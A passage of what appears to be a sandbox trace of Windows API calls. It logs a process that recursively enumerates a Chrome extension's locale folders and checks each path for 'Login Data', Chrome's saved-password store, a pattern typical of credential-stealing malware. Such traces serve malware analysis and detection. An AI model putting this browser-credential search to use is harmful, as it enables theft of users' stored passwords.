ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.577] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.577] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.577] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.577] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.577] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned 137 [0161.577] lstrlenW (lpString="\\") returned 1 [0161.578] GetProcessHeap () returned 0x8e0000 [0161.578] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.578] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" [0161.578] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\" [0161.578] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\") returned 138 [0161.578] lstrlenW (lpString="messages.json") returned 13 [0161.578] GetProcessHeap () returned 0x8e0000 [0161.578] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.578] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\" [0161.578] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" [0161.578] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.578] GetProcessHeap () returned 0x8e0000 [0161.578] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.578] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json", lpSrch="Login Data") returned 0x0 [0161.578] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.578] GetProcessHeap () returned 0x8e0000 [0161.578] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.578] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.578] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.578] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.578] GetProcessHeap () returned 0x8e0000 [0161.578] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.578] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.578] GetProcessHeap () returned 0x8e0000 [0161.578] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.578] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="nl", cAlternateFileName="")) returned 1 [0161.578] lstrcmpiW (lpString1="nl", lpString2=".") returned 1 [0161.579] lstrcmpiW (lpString1="nl", lpString2="..") returned 1 [0161.579] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.579] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.579] lstrlenW (lpString="\\") returned 1 [0161.579] GetProcessHeap () returned 0x8e0000 [0161.579] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.579] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.579] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.579] lstrlenW (lpString="nl") returned 2 [0161.579] GetProcessHeap () returned 0x8e0000 [0161.579] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.579] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" [0161.579] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.579] GetProcessHeap () returned 0x8e0000 [0161.579] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.579] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned 137 [0161.579] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned 137 [0161.579] lstrlenW (lpString="\\*.*") returned 4 [0161.579] GetProcessHeap () returned 0x8e0000 [0161.579] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.579] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" [0161.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*.*" [0161.579] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.580] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.580] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.580] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.580] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.580] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.580] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned 137 [0161.580] lstrlenW (lpString="\\") returned 1 [0161.580] GetProcessHeap () returned 0x8e0000 [0161.580] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.580] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" [0161.580] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\" [0161.580] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\") returned 138 [0161.580] lstrlenW (lpString="messages.json") returned 13 [0161.580] GetProcessHeap () returned 0x8e0000 [0161.580] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.580] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\" [0161.580] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" [0161.580] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.581] GetProcessHeap () returned 0x8e0000 [0161.581] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.581] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.581] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.581] GetProcessHeap () returned 0x8e0000 [0161.581] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.581] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.581] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.581] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.581] GetProcessHeap () returned 0x8e0000 [0161.581] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.581] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.581] GetProcessHeap () returned 0x8e0000 [0161.581] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.581] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="no", cAlternateFileName="")) returned 1 [0161.581] lstrcmpiW (lpString1="no", lpString2=".") returned 1 [0161.581] lstrcmpiW (lpString1="no", lpString2="..") returned 1 [0161.581] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.581] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.581] lstrlenW (lpString="\\") returned 1 [0161.581] GetProcessHeap () returned 0x8e0000 [0161.581] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.581] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.581] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.581] lstrlenW (lpString="no") returned 2 [0161.581] GetProcessHeap () returned 0x8e0000 [0161.581] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.581] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" [0161.581] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.582] GetProcessHeap () returned 0x8e0000 